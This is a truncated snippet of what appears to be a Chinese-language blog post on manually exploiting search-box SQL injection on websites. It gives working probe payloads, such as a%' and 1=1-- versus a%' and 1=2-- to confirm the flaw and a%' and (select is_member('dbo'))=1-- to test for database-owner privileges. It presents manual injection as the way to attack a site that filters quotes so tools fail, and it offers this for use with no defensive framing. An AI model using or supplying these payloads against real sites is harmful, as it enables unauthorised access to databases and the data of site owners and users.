2024-11-26 厉飞雨 阅读(2) 评论(0) 赞(0)

首先，简单的判断搜索型注入漏洞存在不存在的办法是先搜索，如果出错，说明90%存在这个漏洞。 a%' and 1=1-- 正常 a%' and 1=2-- 错误 有注入 由于网站过滤了单引号等等的。所以工具不行，要手工了。 判断权限 a%' and (select is_member('dbo'))=1-- 返回正常则 sa...